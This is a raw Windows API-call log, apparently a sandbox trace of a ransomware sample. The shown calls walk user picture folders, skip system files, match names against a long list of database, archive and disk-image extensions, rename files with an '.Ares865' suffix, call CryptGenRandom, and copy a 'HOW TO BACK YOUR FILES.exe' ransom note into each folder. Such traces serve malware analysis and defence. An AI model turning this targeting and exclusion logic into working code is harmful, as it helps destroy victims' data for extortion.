[0084.602] lstrlenW (lpString="ns4") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.602] lstrlenW (lpString="nsf") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.602] lstrlenW (lpString="nv") returned 2 [0084.602] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.602] lstrlenW (lpString="nv2") returned 3 [0084.602] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.602] lstrlenW (lpString="nwdb") returned 4 [0084.602] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.602] lstrlenW (lpString="nyf") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.603] lstrlenW (lpString="odb") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.603] lstrlenW (lpString="odb") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.603] lstrlenW (lpString="oqy") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.603] lstrlenW (lpString="ora") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.603] lstrlenW (lpString="orx") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.603] lstrlenW (lpString="owc") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.603] lstrlenW (lpString="p96") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.603] lstrlenW (lpString="p97") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.603] lstrlenW (lpString="pan") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.603] lstrlenW (lpString="pdb") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.603] lstrlenW (lpString="pdm") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.603] lstrlenW (lpString="pnz") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.603] lstrlenW (lpString="qry") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.603] lstrlenW (lpString="qvd") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.603] lstrlenW (lpString="rbf") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.603] lstrlenW (lpString="rctd") returned 4 [0084.603] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.603] lstrlenW (lpString="rod") returned 3 [0084.603] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.603] lstrlenW (lpString="rodx") returned 4 [0084.603] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.604] lstrlenW (lpString="rpd") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.604] lstrlenW (lpString="rsd") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.604] lstrlenW (lpString="sas7bdat") returned 8 [0084.604] lstrlenW (lpString="sbf") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.604] lstrlenW (lpString="scx") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.604] lstrlenW (lpString="sdb") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.604] lstrlenW (lpString="sdc") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.604] lstrlenW (lpString="sdf") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.604] lstrlenW (lpString="sis") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.604] lstrlenW (lpString="spq") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.604] lstrlenW (lpString="te") returned 2 [0084.604] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.604] lstrlenW (lpString="teacher") returned 7 [0084.604] lstrcmpiW (lpString1="ser.bmp", lpString2="teacher") returned -1 [0084.604] lstrlenW (lpString="tmd") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.604] lstrlenW (lpString="tps") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.604] lstrlenW (lpString="trc") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.604] lstrlenW (lpString="trc") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.604] lstrlenW (lpString="trm") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.604] lstrlenW (lpString="udb") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.604] lstrlenW (lpString="udl") returned 3 [0084.604] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.605] lstrlenW (lpString="usr") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.605] lstrlenW (lpString="v12") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.605] lstrlenW (lpString="vis") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.605] lstrlenW (lpString="vpd") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.605] lstrlenW (lpString="vvv") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.605] lstrlenW (lpString="wdb") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.605] lstrlenW (lpString="wmdb") returned 4 [0084.605] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.605] lstrlenW (lpString="wrk") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.605] lstrlenW (lpString="xdb") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.605] lstrlenW (lpString="xld") returned 3 [0084.605] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.605] lstrlenW (lpString="xmlff") returned 5 [0084.605] lstrcmpiW (lpString1="r.bmp", lpString2="xmlff") returned -1 [0084.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.Ares865") returned 67 [0084.605] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.ares865"), dwFlags=0x1) returned 1 [0084.606] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.607] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.608] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.608] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.608] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.608] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.611] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.611] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.611] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.612] CloseHandle (hObject=0x15c) returned 1 [0084.612] CloseHandle (hObject=0x118) returned 1 [0084.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.613] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0084.613] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0084.613] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0084.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0084.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0084.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0084.613] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0084.613] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0084.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0084.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0084.614] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0084.614] GetLastError () returned 0x0 [0084.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0084.615] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0084.615] CloseHandle (hObject=0x120) returned 1 [0084.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0084.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0084.615] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0084.615] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0084.615] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0084.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.615] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.615] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0084.615] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0084.615] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.615] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0084.615] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0084.615] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="aoldtz.exe") returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".") returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="..") returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="windows") returned -1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="bootmgr") returned 1 [0084.615] lstrcmpiW (lpString1="usertile10.bmp", lpString2="temp") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="pagefile.sys") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="boot") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="ids.txt") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="ntuser.dat") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="perflogs") returned 1 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2="MSBuild") returned 1 [0084.616] lstrlenW (lpString="usertile10.bmp") returned 14 [0084.616] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned 69 [0084.616] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile10.bmp" | out: lpString1="usertile10.bmp") returned="usertile10.bmp" [0084.616] lstrlenW (lpString="usertile10.bmp") returned 14 [0084.616] lstrlenW (lpString="Ares865") returned 7 [0084.616] lstrcmpiW (lpString1="e10.bmp", lpString2="Ares865") returned 1 [0084.616] lstrlenW (lpString=".dll") returned 4 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".dll") returned 1 [0084.616] lstrlenW (lpString=".lnk") returned 4 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".lnk") returned 1 [0084.616] lstrlenW (lpString=".ini") returned 4 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".ini") returned 1 [0084.616] lstrlenW (lpString=".sys") returned 4 [0084.616] lstrcmpiW (lpString1="usertile10.bmp", lpString2=".sys") returned 1 [0084.616] lstrlenW (lpString="usertile10.bmp") returned 14 [0084.616] lstrlenW (lpString="bak") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.616] lstrlenW (lpString="ba_") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.616] lstrlenW (lpString="dbb") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.616] lstrlenW (lpString="vmdk") returned 4 [0084.616] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.616] lstrlenW (lpString="rar") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.616] lstrlenW (lpString="zip") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.616] lstrlenW (lpString="tgz") returned 3 [0084.616] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.616] lstrlenW (lpString="vbox") returned 4 [0084.616] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.617] lstrlenW (lpString="vdi") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.617] lstrlenW (lpString="vhd") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.617] lstrlenW (lpString="vhdx") returned 4 [0084.617] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.617] lstrlenW (lpString="avhd") returned 4 [0084.617] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.617] lstrlenW (lpString="db") returned 2 [0084.617] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.617] lstrlenW (lpString="db2") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.617] lstrlenW (lpString="db3") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.617] lstrlenW (lpString="dbf") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.617] lstrlenW (lpString="mdf") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.617] lstrlenW (lpString="mdb") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.617] lstrlenW (lpString="sql") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.617] lstrlenW (lpString="sqlite") returned 6 [0084.617] lstrcmpiW (lpString1="10.bmp", lpString2="sqlite") returned -1 [0084.617] lstrlenW (lpString="sqlite3") returned 7 [0084.617] lstrcmpiW (lpString1="e10.bmp", lpString2="sqlite3") returned -1 [0084.617] lstrlenW (lpString="sqlitedb") returned 8 [0084.617] lstrcmpiW (lpString1="le10.bmp", lpString2="sqlitedb") returned -1 [0084.617] lstrlenW (lpString="xml") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.617] lstrlenW (lpString="$er") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.617] lstrlenW (lpString="4dd") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.617] lstrlenW (lpString="4dl") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.617] lstrlenW (lpString="^^^") returned 3 [0084.617] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.618] lstrlenW (lpString="abs") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.618] lstrlenW (lpString="abx") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.618] lstrlenW (lpString="accdb") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accdb") returned -1 [0084.618] lstrlenW (lpString="accdc") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accdc") returned -1 [0084.618] lstrlenW (lpString="accde") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accde") returned -1 [0084.618] lstrlenW (lpString="accdr") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accdr") returned -1 [0084.618] lstrlenW (lpString="accdt") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accdt") returned -1 [0084.618] lstrlenW (lpString="accdw") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accdw") returned -1 [0084.618] lstrlenW (lpString="accft") returned 5 [0084.618] lstrcmpiW (lpString1="0.bmp", lpString2="accft") returned -1 [0084.618] lstrlenW (lpString="adb") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.618] lstrlenW (lpString="adb") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.618] lstrlenW (lpString="ade") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.618] lstrlenW (lpString="adf") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.618] lstrlenW (lpString="adn") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.618] lstrlenW (lpString="adp") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.618] lstrlenW (lpString="alf") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.618] lstrlenW (lpString="ask") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.618] lstrlenW (lpString="btr") returned 3 [0084.618] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.618] lstrlenW (lpString="cat") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.619] lstrlenW (lpString="cdb") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.619] lstrlenW (lpString="ckp") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.619] lstrlenW (lpString="cma") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.619] lstrlenW (lpString="cpd") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.619] lstrlenW (lpString="dacpac") returned 6 [0084.619] lstrcmpiW (lpString1="10.bmp", lpString2="dacpac") returned -1 [0084.619] lstrlenW (lpString="dad") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.619] lstrlenW (lpString="dadiagrams") returned 10 [0084.619] lstrcmpiW (lpString1="tile10.bmp", lpString2="dadiagrams") returned 1 [0084.619] lstrlenW (lpString="daschema") returned 8 [0084.619] lstrcmpiW (lpString1="le10.bmp", lpString2="daschema") returned 1 [0084.619] lstrlenW (lpString="db-journal") returned 10 [0084.619] lstrcmpiW (lpString1="tile10.bmp", lpString2="db-journal") returned 1 [0084.619] lstrlenW (lpString="db-shm") returned 6 [0084.619] lstrcmpiW (lpString1="10.bmp", lpString2="db-shm") returned -1 [0084.619] lstrlenW (lpString="db-wal") returned 6 [0084.619] lstrcmpiW (lpString1="10.bmp", lpString2="db-wal") returned -1 [0084.619] lstrlenW (lpString="dbc") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.619] lstrlenW (lpString="dbs") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.619] lstrlenW (lpString="dbt") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.619] lstrlenW (lpString="dbv") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.619] lstrlenW (lpString="dbx") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.619] lstrlenW (lpString="dcb") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.619] lstrlenW (lpString="dct") returned 3 [0084.619] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.619] lstrlenW (lpString="dcx") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.620] lstrlenW (lpString="ddl") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.620] lstrlenW (lpString="dlis") returned 4 [0084.620] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.620] lstrlenW (lpString="dp1") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.620] lstrlenW (lpString="dqy") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.620] lstrlenW (lpString="dsk") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.620] lstrlenW (lpString="dsn") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.620] lstrlenW (lpString="dtsx") returned 4 [0084.620] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.620] lstrlenW (lpString="dxl") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 